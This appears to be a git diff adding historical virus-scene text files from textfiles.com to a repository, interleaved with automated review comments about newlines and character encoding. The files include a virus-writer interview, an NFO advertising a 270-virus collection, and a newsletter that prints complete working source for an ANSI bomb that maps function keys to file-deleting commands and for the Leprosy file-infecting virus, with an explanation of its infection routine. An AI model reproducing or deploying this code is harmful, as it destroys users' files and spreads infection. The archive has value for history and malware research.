The fact is that it isn't important to shield + people from this knowledge, what is important is for people to know that + can be done, and perhaps find a way to prevent it. Just consider what + would happen if someone starting putting a virus in a DDD ][.2. First of + all, everyone would get a copy of it and use it. Only a few would be + that interested to check what these new updates to it were. And perhaps + within a month, whenever you tried to unpack a program, it would instead + initialize the disk with your file on it. So, like I said, beware of + those that would jeapordize themselves and would do such a thing. Of + course, I wouldn't hesitate to drop my "bomb" on a few leech friends of + mine who don't have modems, but thats a different story. I don't have + to worry too much about getting the "cold" back from them. They'll be + too screwed up to worry about trading disks. Well, I've said too much + already. Please keep my name on this file if you put it on your BBS, + ect..., but I don't really care if you want to put your local AE line + number, or whatever up at the beginning too, just give me credit where + I'm due. Thank-you, and good luck, and, as I said before, be careful + out there!! + + FROM -- THE CHESHIRE CAT + written: 12/30/85 +=-=-=-= If you need to reach me for more information, try E-mail on =-=-=-= +=-=-=-=-=-=-=-=-=-=-= OSB systems (215)-395-1291 =-=-=-=-=-=-=-=-=-=-=-=-=- +=-=-=-= I may offer a listing of my virus's coding if there is =-=-=-=-=-=- +=-=-=-= significant interest. But I leave you now, The Cheshire Cat -=-=-= +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +L5> \ No newline at end of file diff --git a/textfiles.com/virus/ccinterv.iew b/textfiles.com/virus/ccinterv.iew new file mode 100644 index 00000000..34fb3751 --- /dev/null +++ b/textfiles.com/virus/ccinterv.iew 
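Review bot: the last content line of catvir.txt, "L5>" immediately before the "\ No newline at end of file" marker, reads as a stray terminal or pager prompt rather than part of the article, and the file also ends without a trailing newline while the preceding text files in this patch end with one. Confirm whether "L5>" is present in the upstream textfiles.com copy; if it is, keep it (the mirror should be verbatim), but if it was picked up during download it should be dropped. Either way, the repository would benefit from a short README note stating whether files in this tree are stored byte-exact or normalized (trailing newline, line endings), since the hunks in this patch are inconsistent on that point.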
@@ -0,0 +1,257 @@ +-------------------------------------------------------------------------------- + INTERVIEW WITH CROM-CRUACH / TRIDENT / THE NETHERLANDS +-------------------------------------------------------------------------------- + + + Give me a short description of who you are! + +- Hacker, Phreaker, Raver, Freak & Stoner... + + From where did you get your handle? + +- Crom-Cr#ach is the ancient Irish supreme Wormgod... + + When did you discover the world of computers? + +- About ten years ago a nephew had a BBC I used to screw up. Then some + friends got C64s- and when the PC began to appear on the market, my + father bought one... + + How long have you been active in the scene? + +- With the C64 I joined some Dutch demogroups, about 8 jears ago... + + How did you came into the virus business? + +- Some years ago the media started to hype about the New Danger- I was + able to find a copy of Brain and Burger, debugged them to death + (no sources...) and made a simple direct-action .com infector (never + released, probably wiped out with one of my zillion hd-crashes). + + What part(s) of the underground do you think needs improvements? + +- The destructive part. I still can't figure why people smart enough + to make a nice virus are unable to see that they harm both foes and + friends with this... also, part of the underground still parties a + lot, but doesn't do anything against the continuing decrease of their + rights (Encryption ban/Clipper chip, war on drugs etc...) + + Positive/negative aspects of the scene? + +- Positive: The good tie between the groups, and the open distribution + of knowledge. + Negative: The quantity-above-quality attitude some still seem to + have. Please, amaze the scene by something inventive instead of yet + another boring dirct-action-.COM-infector! + + Have you been involved in any other group than Trident? + +- Yes, many, though this is the only specific virusgroup. + + Who started/created Trident? 
+ +- Tardy, I thought... + + What's the groups goal? + +- Throw parties once in a while... ehrm, create and divide chaos? + + Who are the "leading/head-persons" in the group? + +- I can't really see a leader... we all program, each in our own style... + + What's your position in it? + +- Ehrm... virus author? :-) + + How is Trident (currently) organzied? + +- Not. Anarchy to the bone. + + Have you got any contacts with other virus-groups/programmers? + +- Yes, though I'm not really active in the swapping field... + + Can anyone ask for membership, or are you a "private" group? + +- Nah, it's private... + + Have you ever thought of/are you currently releasing some sort of + electronic magazine? + +- I wrote a hypertext Hitchhiker's Guide to Viruses, and stopped at + 90%. When I've got time, I'll finish it. Someday ;-) + + Are you into other things such as hacking and phreaking aswell, or + just viruses? + +- Yes, I've hacked and phreaked as well, though I haven't done this for + quite some time... + + Do you have some network-connection (some sort of e-mail or something)? + +- Yes, cc@weeds.hacktic.nl... + + Can you name a few viruses that members of Trident has written? + +- Yep. + + Which of them have you written yourself? + +- I haven't released that many; Little Mess, Horns of Jericho, Weirdo + and Cheeba were the only ones I believe- I rarely release my creations... + I mostly write programs showing a specific hole in the system + protection, I rarely build an entire virus around it... + + Which one was the hardest to write? + +- I really can't tell; I always write one because I want to try + something new- this always took some time... Cheeba was my first + EXE-infector; Little Mess spreads itself through Telix Salt-scripts, + I had to figure that format- and Horns of Jericho ate its way through + TB-Scan's .AVR files (if you can still remember TB using them...)- I + had to figure out that format as well... 
+ + Do you have any sort of company or law-enforcement who are trying to + hunt Trident down? + +- Yes, the section Computercriminality of the CRI... + + Are they a real threat or just "childish"? + +- Neither; they mainly hunt authors of viruses that cause direct damage... + + Have you ever had any trouble in the group with the result of kicked + member(s)? + +- No... + + How good are Trident comparing to other groups? + +- So, what answer do you expect? ;-) + + Do you call out aloth, and if so how? (phone/internet etc.) + +- I mainly hang out on the Internet, I rarely call BBSses... + + Do you have any couriers that spread your products around? + +- I do not spread my viruses; if I make one, I publish it in a mag... + + What do you think about the laws against h/p/v that has arrived + lately? + +- They seem to make installation-disks illegal as well... I asked Harry + Onderwater, the chief of the CRI on the hacktic.virus forum about + this; he told he told he would give his view on this, but hasn't done + this yet... + + What do you think about newspapers describing the scene as nerds? + +- Who cares about the opinions of somebody studying something this big + for one single day?! I couldn't care less about those believing every- + thing written in the newspapers... + + Has the scene in any way influented on your real life? + +- Yep, I met many friends there... + + Would you feel guilty if one of your viruses made damage to a hospital? + +- Yes; does this really need an explaination? I always try to make my + viruses as compatible as possible, and surely don't make destructive + ones. Sheesh, it is *way* more difficult to make something really non- + destructive... + + Do you see any differences between the scene now and a couple of + years ago (concerning the underground part ofcause)? + +- Yes, the scene seems to be more focused on personal freedom (Clipper + chip, Drug laws etc...) + + Which virus-magazine do you think is the best avalible now-a-days? 
+ +- All have their individual qualities. (Politically correct or what? ;-) + + Which virus-group/programmer do you admire/like? + +- The non-destructive ones which have the knowledge but still try to + help others... + + Which country is the best virus-writing today? (before it was + Bulgaria, maybe changed?) + +- Bulgaria isn't that active anymore- The US is pretty active, but + considering the size of the Netherlands, I think our country is + pretty good as well... + + Which virus-group(s) do you think is the best? + +- <#include Politically_Correct_Answer.h> + + What do you think about these virus generators, such as PS-MPC? + +- Good generators are real art... + + What do you think about the people using them? + +- Yawn. Wake up, learn some code! + + What do you think about people bragging over (almost) nothing + and ragging with other groups aswell? + +- Well, I admire them. I wish I could be more like them ;-) + + What do you think about such individes as board-crashers? + +- They're ruining the scene, giving hackers a bad name... Luckily, + they're usually morons unable to hack anything but some just-starting + local bbsses... + + Describe the perfect virus : + +- A totally compatible multi-platform virus (Bites from IBM to Amiga + to Mac to...) + + Describe the perfect viruscoder : + +- See abuv... -Creator + + Describe the AV-community with a few lines : + +- Nerds wearing anoracks and such. or- a bunch of would-be cover-girls + eager to attract the public attention, smiling holy and in the + meantime kicking eachother hard below the camera field... ;-) + + Which AV-program do think is the best? + +- F-Prot. It's reliable, has very a detailed virus name library and is + free for individual use... + + What do you think about the underground's future? + +- I think the underground will become even more aimed against the + governmental attempts to limit personal freedom (Clipper chip, net + control, drug laws etc.) 
+ + Do you know/heard of any new technics coming in the near future? + +- I'm pretty sure the PowerPC will give virus authors a wide scala of + new possibilities... + + Any advice to people who want to learn the basic of virus-writing? + +- Try to figure most things out yourself- otherwise you'll force + yourself into the same methods and problems the original author + had, and are later on way less likely to come up with something + new because you're stuck with the standard techniques... + + Something else you wish to say? + +- Quality above quantity! + + Do you wish to send any greets? + +- Nah, I always forget some very important one. Therefore, greetings + to You, the reader (except if you consider yourself for some reason + a foe; decide for yourself :-) \ No newline at end of file diff --git a/textfiles.com/virus/chaos.nfo b/textfiles.com/virus/chaos.nfo new file mode 100644 index 00000000..78d4edd7 --- /dev/null +++ b/textfiles.com/virus/chaos.nfo 
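Review bot: ccinterv.iew is the second file in this patch committed without a trailing newline ("\ No newline at end of file", same as catvir.txt), while the Bontchev paper above ends with one. Pick one policy for the import and apply it to the whole tree: either leave every file byte-exact as served by textfiles.com and say so in a README, or run a single normalization pass (add the final newline, fix line endings) over all of them, so that later diffs against the upstream source are not cluttered by this difference. The odd extension split in the file name (`ccinterv.iew`) matches the original textfiles.com name and is fine to keep as-is.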
@@ -0,0 +1,96 @@ + + ۱۱ ߱ + ߱ ۱ + ߱ ߱ ߱ + + + O F + + + ߱ ߱ + + ߱ ߱ + + + + O R I G I N A L R E L E A S E + + Viral Collector's Kit #1 + + By + + The Knights of Chaos + + + Released into the world on 02/04/95 + + +This is a Knights of Chaos Original Release. We've compiled this large package +of 270 viruses, virus creating and writing tools, informational text files +and Virus Group Magazines, and brought them together into VCK #1. + +We plan on releasing 1000+ viruses total in sequel Viral Collector's Kits. + +The Viruses you'll find in this package are documented and BBS ready. What does +that mean? They've been pre file_id.diz'ed with the virus' common name and the +name it can be found under in Patricia Hoffman's Virus Summary (VSUMX 4.1). +Each zip is pre-loaded with a warning disclaimer about the contents, an excerpt +from VSUMX 4.1 about what the virus is and what it does. All you have to do is +put them up on your board if you support virus transfers. + +Our main goal is to provide many computer viruses for reverse engineering for +those who are curious about how viruses work. Many virus source code files are +also included. + + What you get in Viral Collector's Kit #1 + + + You Get: + + Virus Tools and Files + + * 270 Viruses in our Numerical, A, B, and C Groups + (BBS Ready! 
Pre file_id.diz'd) + * Nowhere Man's Virus Construction Lab + * Mad Maniac's Mutation Engine for Polymorphic Viruses + * Dark Slayer's Confusion Engine for Polymorphic Viruses + * GenVirus Construction Lab (French) + * KOH, An encryption virus for keeping your data secret + * 9 virus ASM files by Immortal Riot + + Programs and Disassembling Tools + + * A86 v4.00 Macro Assembler (Shareware) + * D86 v4.00 Debugger (Shareware) + * Disaster v1.0 Disassembler (Shareware) + * ASM Editor Three (Shareware) + * Nowhere Man's NowhereUtilities + * Detector, A Virus Strain detector + * CatDiz, A File_id.diz cataloging system (Freeware) + * Dizview, View Diz files within Zip Files (Shareware) + * UUENCODE & UUDECODE for sending us files via internet + + Virus Scanners and Virus Signature Update Files + + * VSUMX v4.10 Virus Summary Hypertext (Shareware) + * McAfee Scan v2.14E (Shareware) + * Latest Central Point Anti-Virus 2.x Signature Updates + For Dos and Windows released 01/06/95 + * ThunderByte Anti-Virus v6.31 with processor optimized EXE + files. + + Informational Texts and 'Zines + + * Skism's 40Hex Magazine Issues 1 through 13 + * Phalcon/Skism's Virus Texts 1 through 5 + * Crypt Newsletter Issues 1 through 29 (missing issues) + * NuKE InfoJournals 1 through 8 + + Miscellaneous + + * Knights of Chaos' PGP Public Key + * K-RaD README and VCK-1 Hypertexted files (Be sure to read them!) + +Have Fun! + +Neural Nightmare/K.Chaos '95 diff --git a/textfiles.com/virus/cmvs-1.v1 b/textfiles.com/virus/cmvs-1.v1 new file mode 100644 index 00000000..bc7236a6 --- /dev/null +++ b/textfiles.com/virus/cmvs-1.v1 
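Review bot: the banner art at the top of chaos.nfo has been committed as mis-decoded text (runs of "۱۱ ߱" and similar), which means the original CP437 box-drawing and shade characters were reinterpreted in a different code page somewhere between download and commit. Check the bytes of the upstream file and either store it unchanged (and mark `*.nfo binary` in `.gitattributes` so Git does not touch it) or convert it once, deliberately, with `iconv -f CP437 -t UTF-8`, so the art is readable; the current mixture is neither. The rest of the file is plain ASCII and is unaffected, so only the header block needs re-importing.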
@@ -0,0 +1,1776 @@ +DISCLAIMER: + +The author will NOT accept responsibility for any damage to your + +computer media and/or files, or responsibility for any action you might + +take that will result in legal proceedings, the source code, if any, in + +this newsletter is THE REAL THING, and you, after you read this, will be + +well aware of what virii are capable of, and knowing that, it is expected + +that you will act responsibly. + + + +DISCLAIMER II: + +All I know about programming I have learned on my own, and did not go to + +school for, and am still learning. As a result, I am sometimes prone to + +make mistakes, and be wrong about things, so please be patient if I should + +make a mistake, or say something that isn't true, which would be totally + +unintentional. + + + + + + ViriiSearch + + ----------- + + + + The Virus Research Newsletter + + + + Volume 1, Number 1 + + + +CREDITS: + +----------------------------------------------------------------------------- + +Author...................................................Criminal Minded + +Editor...................................................Criminal Minded + +Ideas, Source, Examples Supplied By......................Criminal Minded + +Facts Stolen From Several Sources By.....................Criminal Minded + +----------------------------------------------------------------------------- + + + +Introduction: + + + +Welcome To The First Issue Of Viriisearch, The Virus Research Newsletter. + + + +I have always had a fascination of computer virii, since I first heard the + +word. I, like a lot of people, had no idea what they were about, and was + +extremely curious. And this newsletter will cover my process as I find out + +more about them. How they are written, why they act like they do, and if + +possible, why people would write them. + + + +In this issue: + + + +Prevention And Protection Methods + +The "Internet Worm" + +Trojans, Worms, Virii, Ansi Bombs: What's the difference? 
+ +Benign VS Malignant Virii + +Sample Source Code Of Virii + +Discussion Of The Infection And Encryption Methods Used By "Leprosy" + +The "Uncompress" Virus + +"Suicidal Tendencies" Department/Virus Of The Month + +Discussion Of Anti Viral Software + +Things You Should Know + + + +----------------------------------------------------------------------------- + +Prevention And Protection Methods: + +----------------------------------------------------------------------------- + + + +After the infamous "Michelangelo" panic, I realized what the masses are + +lacking is virus literacy. If people had a understanding of them, and knew + +the appropriate methods of prevention, and dealing with a infection, the + +situation would've never been blown out of proportion like it was. When I + +hear people ask questions such as "If I Put My Toothbrush Near A Infected + +Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok, + +maybe that example is a little exaggerated, but some of the questions are + +hitting close to that level of stupidity, so here are some protection and + +prevention methods: + + + +1. If you download a file from a public BBS, or a friend gives you a file + + that he downloaded from somewhere, be sure and uncompress the file onto + + a floppy and run your virus scanner on it. NEVER run a new file without + + checking it first. Some people believe a virus scanner can spot a file + + that is infected within a compressed file by running the virus scanner + + on it, this is NOT true. You have to decompress the file first. + + + + By doing this, you are dropping your chances of infection considerably + + BUT there is always the chance of a unknown virus that the scanner won't + + spot so that is why you have to ALWAYS have a backup of all your data on + + tape or disk. That way if the unknown virus wipes your hard drive, you + + have the backup and nothing is lost. + + + +2. 
In the event of a virus infection, shut your computer off immediately and + + wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some + + virii can survive through a warm boot. Always do a "cold boot" (Shut the + + computer OFF). After the 10-20 seconds, boot your computer from a CLEAN + + WRITE PROTECTED DOS Bootable disk, and then run your virus scanner from + + a WRITE PROTECTED disk. (The reason for having the disks write protected + + is just in case the virus is still lurking around, it won't be able to + + write itself and infect the floppies). If the virus is a known one, have + + the virus scanner either fix the infected files, or delete them (and + + replace from your backup) or make a note of the infected files and erase + + them manually. + + + +3. How do you spot a attack by a unknown virus? + + + + A) Change in sizes of files + + B) Change of file dates/times + + C) Deleted files + + D) Slower processing time + + E) Unusual messages + + F) Disk activity, more than usual (Writing to the disk when it's not + + neccesary) + + + +4. What to do in the event of a unknown virus attack? + + + + A) Follow steps of shutting machine off and re-booting as outlined in + + #2 + + B) Run your virus scanner and have it look for files that changed in + + size or date (if your scanner has a feature that makes note of + + original virus sizes/dates/times) + + C) If your virus scanner doesn't make note of original sizes/dates/times + + you can always make note of them manually and then check them yourself. + + It's time consuming, but can prevent serious damage to your data, and + + you should try to isolate a infected file and send it to ME (info on + + how to get it to me at the end of the newsletter) so I can attempt to + + dissect it and notify the appropriate person of the new virus. 
+ + D) Some virus scanners come with a TSR that will prevent any writing to + + disk, it will pop a window or message on the screen saying: Attempting + + to write to Do you wish to do so? If something is trying to + + write to a file that shouldn't be written to at that time, chances are + + you are dealing with a unknown virus and should say no. Then try to + + find and isolate the virus. + + E) How do you spot a unknown virus or a known virus without running + + a virus scanner? + + + + 1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority + + of them are .COM files so if you have, let's say, a 6K .COM file + + that claims to be a "awesome game" I'd be a little bit suspicious. + + 2) Weird names. I would not run "DIE.COM" or "KILLER.COM" and over + + the years I have run into files named that, when people tried to + + infect my computer. At least they could've named it something else + + not so obvious. + + 3) As stated in #1, the MAJORITY of them are small .COM files but they + + can be .EXE files as well, and bigger then 10K. + + + +All it takes is a little bit of common sense, and 99% of what could've been + +virus attacks on your computer can be prevented. All you have to remember is + +that they cannot infect your machine unless run first...BUT there is one + +virus out there that, when uncompressed, activates itself. This virus does + +NOT have to be executed in order to infect your machine, and it will be + +discussed later on. In the event of where this "uncompress" virus wipes some + +of your data, or any other virus, that's what backups are for. ALWAYS HAVE A + +BACKUP OF YOUR HARD DRIVE and NEVER put a floppy in the drive and run a + +program when there is a virus in memory because, chances are, that floppy + +will get ruined/infected as well, unless it is write protected. The instant + +you are aware of a infection, shut the machine off! 
Because there are some + +virii that, upon finding a write protected floppy that it cannot infect, or + +something else it can't do, "get mad" and cause destruction. + + + +----------------------------------------------------------------------------- + +The "Internet Worm" + +----------------------------------------------------------------------------- + + + +This has to be the most widely publicized case of a virus attack ever. + + + +On 10/02/88, Robert Morris Jr., a graduate student, wrote and released a worm + +that infected "Internet" the worldwide network. Within hours, it infected + +thousands of computers. The worm was benign, not causing any damage to files + +or media, but replicated itself over and over rapidly, and resulted in the + +computers on Internet having to be shut down and all copies of the worm + +removed. Some of the hosts were still disconnected from the network eight + +days later, showing the impact this worm had. Morris claimed he did it as a + +experiment, and made a mistake in how fast it actually would replicate. The + +media, namely NY Times, USA Today, and The Wall Street Journal, gave the worm + +front page coverage. On November 4th, teams at several institutions went to + +work and successfully "decompiled" the worm and studied it in the language it + +was written in, "C language", but the source code was never released for fear + +of hackers using the source for malicious purposes. In the end, Morris was + +removed from school, ordered to pay $10,000 in fines, perform 400 hours of + +community services and was on 3 years probation. Some people argued as to + +whether or not Morris was guilty because he evidently didn't do it to cause + +damage, but rather as a experiment that went wrong. + + + +What the worm did: It hacked it's way into hosts attached to the internet by + +cracking passwords and then replicated itself rapidly, taking up all the + +memory and forcing the hosts to be shut down. 
+ + + +----------------------------------------------------------------------------- + + + +Trojans, Worms, Virii, Ansi Bombs: What's the difference? + + + +----------------------------------------------------------------------------- + + + +Trojans: Programs disguised as a useful program or a existing real program + + that can cause damage on your system. + + + +Worms: Benign virii, rarely causing damage to media or files, such as the + + Internet worm. + + + +Ansi Bombs: Tiny programs that use ANSI to remap your keyboard causing keys, + + when pressed, to do other things. + + + +Example: If a ansi bomb was in memory, and it remapped the "K" key to erase + + all the files in the current directory, as soon as you pressed K + + the files would be gone. Usually when you type C>ERASE *.* + + MS-DOS will respond with: All the files in the current directory + + will be deleted! Are you sure (y/n)? + + + + Some ansi bombs are intelligent and can prevent such DOS messages + + from appearing. + + + +----------------------------------------------------------------------------- + + + +Here is the source code to a simple ansi bomb: + + + +----------------------------------------------------------------------------- + + + +#include + +#define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S) + +#define F1 59 + +#define F2 60 + +#define F3 61 + +#define F4 62 + +main() + +{ + + KILL(F1, "DEL *.ZIP"); + + KILL(F2, "DEL *.ARJ"); + + KILL(F3, "DEL *.COM"); + + KILL(F4, "DEL *.EXE"); + +} + + + +----------------------------------------------------------------------------- + + + +This just assigns the string (DEL *.ZIP etc) to the respective keys. If this + +ansi bomb was in memory, and you pressed F1, it would delete all the files + +in the current directory with the extension of .ZIP. The command (DEL *.ZIP) + +would appear on the screen though, and you could use a file recovery program + +to recover the deleted files. 
There are more lethal ansi bombs, ones that can + +format your hard drive and other such destructive acts. + + + +Prevention: Use NANSI or ZANSI rather than ANSI and the ansi bombs won't work. + + + +----------------------------------------------------------------------------- + + + +Virii: Destructive programs that use 'stealth' techniques, and can replicate. + + Not All virii are destructive, some can be benign, and just pop up + + annoying messages time to time or slow down system speed. + + + +----------------------------------------------------------------------------- + + + +No more will be discussed of ANSI Bombs or Trojans as this newsletter is + +dedicated entirely to virii. + + + +----------------------------------------------------------------------------- + + + +Benign VS Malignant Virii: + + + +----------------------------------------------------------------------------- + + + +Benign Virii do not cause damage but do things such as take up all the memory, + +slow processing speed down, and send annoying messages to the console, or the + +printer, etc... + + + +Maligant, or Malicious, Virii cause actual destruction, deleting files, + +destroying the FAT or boot sector, locking up the computer, formatting disks + +or hard drives, etc... + + + +----------------------------------------------------------------------------- + + + +Virus Source Code: + + + +----------------------------------------------------------------------------- + + + +Now for the real thing, we will start with the C Language source code to the + +"Leprosy" Virus. + + + +----------------------------------------------------------------------------- + + + +#pragma inline + + + +#define CRLF "\x17\x14" /* CR/LF combo encrypted. */ + +#define NO_MATCH 0x12 /* No match in wildcard search. 
*/ + + + +char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; + +char *virus_msg[3] = + + { + + CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", + + CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", + + CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." + + }; + + + + + + + +struct _dta /* Disk Transfer Area format for find. */ + + { + + char findnext[21]; + + char attribute; + + int timestamp; + + int datestamp; + + long filesize; + + char filename[13]; + + } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ + + + + + +const char filler[] = "XX"; /* Pad file length to 666 bytes. */ + +const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ + +const int virus_size = 666; /* The size in bytes of the virus code. */ + +const int infection_rate = 4; /* How many files to infect per run. */ + + + +char compare_buf[20]; /* Load program here to test infection. */ + +int handle; /* The current file handle being used. */ + +int datestamp, timestamp; /* Store original date and time here. */ + +char diseased_count = 0; /* How many infected files found so far. */ + +char success = 0; /* How many infected this run. */ + + + + + +/* The following are function prototypes, in keeping with ANSI */ + +/* Standard C, for the support functions of this program. */ + + + +int find_first( char *fn ); + +int find_healthy( void ); + +int find_next( void ); + +int healthy( void ); + +void infect( void ); + +void close_handle( void ); + +void open_handle( char *fn ); + +void print_s( char *s ); + +void restore_timestamp( void ); + + + + + + + +/*----------------------------------*/ + +/* M A I N P R O G R A M */ + +/*----------------------------------*/ + + + +int main( void ) { + + int x = 0; + + do { + + if ( find_healthy() ) { /* Is there an un-infected file? */ + + infect(); /* Well, then infect it! */ + + x++; /* Add one to the counter. 
*/ + + success++; /* Carve a notch in our belt. */ + + } + + else { /* If there ain't a file here... */ + + _DX = (int) ".."; /* See if we can step back to */ + + _AH = 0x3b; /* the parent directory, and try */ + + asm int 21H; /* there. */ + + x++; /* Increment the counter anyway, to */ + + } /* avoid infinite loops. */ + + } while( x < infection_rate ); /* Do this until we've had enough. */ + + if ( success ) /* If we got something this time, */ + + print_s( fake_msg ); /* feed 'em the phony error line. */ + + else + + if ( diseased_count > 6 ) /* If we found 6+ infected files */ + + for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ + + print_s( virus_msg[x] ); + + else + + print_s( fake_msg ); /* Otherwise, keep a low profile. */ + + return; + +} + + + + + +void infect( void ) { + + _DX = (int) dta->filename; /* DX register points to filename. */ + + _CX = 0x00; /* No attribute flags are set. */ + + _AL = 0x01; /* Use Set Attribute sub-function. */ + + _AH = 0x43; /* Assure access to write file. */ + + asm int 21H; /* Call DOS interrupt. */ + + open_handle( dta->filename ); /* Re-open the healthy file. */ + + _BX = handle; /* BX register holds handle. */ + + _CX = virus_size; /* Number of bytes to write. */ + + _DX = (int) codestart; /* Write program code. */ + + _AH = 0x40; /* Set up and call DOS. */ + + asm int 21H; + + restore_timestamp(); /* Keep original date & time. */ + + close_handle(); /* Close file. */ + + return; + +} + + + + + +int find_healthy( void ) { + + if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */ + + if ( healthy() ) /* If it's healthy, OK! */ + + return 1; + + else + + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ + + if ( healthy() ) + + return 1; /* If you find one, great! */ + + if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */ + + if ( healthy() ) /* If it's healthy, OK! */ + + return 1; + + else + + while ( find_next() != NO_MATCH ) /* Try a few more otherwise. 
*/ + + if ( healthy() ) + + return 1; /* If you find one, great! */ + + return 0; /* Otherwise, say so. */ + +} + + + + + + + +int healthy( void ) { + + int i; + + datestamp = dta->datestamp; /* Save time & date for later. */ + + timestamp = dta->timestamp; + + open_handle( dta->filename ); /* Open last file located. */ + + _BX = handle; /* BX holds current file handle. */ + + _CX = 20; /* We only want a few bytes. */ + + _DX = (int) compare_buf; /* DX points to the scratch buffer. */ + + _AH = 0x3f; /* Read in file for comparison. */ + + asm int 21H; + + restore_timestamp(); /* Keep original date & time. */ + + close_handle(); /* Close the file. */ + + for ( i = 0; i < 20; i++ ) /* Compare to virus code. */ + + if ( compare_buf[i] != *(codestart+i) ) + + return 1; /* If no match, return healthy. */ + + diseased_count++; /* Chalk up one more fucked file. */ + + return 0; /* Otherwise, return infected. */ + +} + + + + + +void restore_timestamp( void ) { + + _AL = 0x01; /* Keep original date & time. */ + + _BX = handle; /* Same file handle. */ + + _CX = timestamp; /* Get time & date from DTA. */ + + _DX = datestamp; + + _AH = 0x57; /* Do DOS service. */ + + asm int 21H; + + return; + +} + + + + + +void print_s( char *s ) { + + char *p = s; + + while ( *p ) { /* Subtract 10 from every character. */ + + *p -= 10; + + p++; + + } + + _DX = (int) s; /* Set DX to point to adjusted string. */ + + _AH = 0x09; /* Set DOS function number. */ + + asm int 21H; /* Call DOS interrupt. */ + + return; + +} + + + + + +int find_first( char *fn ) { + + _DX = (int) fn; /* Point DX to the file name. */ + + _CX = 0xff; /* Search for all attributes. */ + + _AH = 0x4e; /* 'Find first' DOS service. */ + + asm int 21H; /* Go, DOS, go. */ + + return _AX; /* Return possible error code. */ + +} + + + + + +int find_next( void ) { + + _AH = 0x4f; /* 'Find next' function. */ + + asm int 21H; /* Call DOS. */ + + return _AX; /* Return any error code. 
*/ + +} + + + + + +void open_handle( char *fn ) { + + _DX = (int) fn; /* Point DX to the filename. */ + + _AL = 0x02; /* Always open for both read & write. */ + + _AH = 0x3d; /* "Open handle" service. */ + + asm int 21H; /* Call DOS. */ + + handle = _AX; /* Assume handle returned OK. */ + + return; + +} + + + + + +void close_handle( void ) { + + _BX = handle; /* Load BX register w/current file handle. */ + + _AH = 0x3e; /* Set up and call DOS service. */ + + asm int 21H; + + return; + +} + + + +----------------------------------------------------------------------------- + + + +With source code discussed in this newsletter, main areas covered will be on + +encryption techniques, how the virus infects files, how they 'replicate' + +and 'breed' and how 'stealth techniques' are implemented in the code. + + + +In this case we will cover how the virus infects the files and encrypts. + + + +----------------------------------------------------------------------------- + + + +Infection Method: + + + +----------------------------------------------------------------------------- + +void infect( void ) { + + _DX = (int) dta->filename; /* DX register points to filename. */ + + _CX = 0x00; /* No attribute flags are set. */ + + _AL = 0x01; /* Use Set Attribute sub-function. */ + + _AH = 0x43; /* Assure access to write file. */ + + asm int 21H; /* Call DOS interrupt. */ + + open_handle( dta->filename ); /* Re-open the healthy file. */ + + _BX = handle; /* BX register holds handle. */ + + _CX = virus_size; /* Number of bytes to write. */ + + _DX = (int) codestart; /* Write program code. */ + + _AH = 0x40; /* Set up and call DOS. */ + + asm int 21H; + + restore_timestamp(); /* Keep original date & time. */ + + close_handle(); /* Close file. */ + + return; + +} + + + +----------------------------------------------------------------------------- + +void infect( void ) is just what he named this function. 
+ + + +The function will return nothing, and be called with no parameters as the two + +"voids" suggest. + + + +Register DX points to the filename as declared in the structure "_dta" + + + +----------------------------------------------------------------------------- + + + +_dta structure: + + + +----------------------------------------------------------------------------- + + + +struct _dta + + { + + char findnext[21]; + + char attribute; + + int timestamp; + + int datestamp; + + long filesize; + + char filename[13]; + + } *dta = (struct _dta *) 0x80; + + + +----------------------------------------------------------------------------- + + + +Next in the "infect" function, 0x00 is assigned to the CX register. + + + +With function 43H in assembly, register CX is assigned with the bit of the + +attribute that you want to set the file to. + + + +Bit: Attribute: + + + + 0 Read Only + + 1 Hidden + + 2 System + + 3-4 Reserved + + 5 Archive + + 6-15 Reserved + + + +Because the author assigned 0x00 to CX, none of the above attributes were set + +on the file, allowing it to be written to. + + + +Next in the "infect" function is 0x01 being assigned to register AL + + + +0x01 is telling the program we want to SET attributes. + + + +Then following that is: 0x43 being assigned to AH + + + +Which is telling the program we want to use function 43H (Get/Set Attributes) + + + +The current handle is assigned to register BX + + + +The size of the virus code, or the number of bytes to write, stored in the + +integer "virus_size" is assigned to register CX + + + +virus_size is declared and initialized at the beginning of the source code + +as a integer with the value "666" + + + +Then the virus code is written to the file, the file is closed and the + +original date and time the file had are restored. 
+ + + +----------------------------------------------------------------------------- + + + +The Method Of Encryption: + + + +----------------------------------------------------------------------------- + +void print_s( char *s ) { + + char *p = s; + + while ( *p ) { /* Subtract 10 from every character. */ + + *p -= 10; + + p++; + + } + + _DX = (int) s; /* Set DX to point to adjusted string. */ + + _AH = 0x09; /* Set DOS function number. */ + + asm int 21H; /* Call DOS interrupt. */ + + return; + +} + +----------------------------------------------------------------------------- + + + +The above function used in "Leprosy", called "print_s" accepts one parameter, + +a string of text, like these ones defined at the beginning of the Leprosy + +source code: + + + +----------------------------------------------------------------------------- + +char *virus_msg[3] = + + { + + CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", + + CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", + + CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." + + }; + + + +----------------------------------------------------------------------------- + +Note: CRLF is defined as "\x17\x14" at the beginning of the source, \x17 + +being the hexadecimal code for a carriage return and \x14 the code for a line + +feed. + +----------------------------------------------------------------------------- 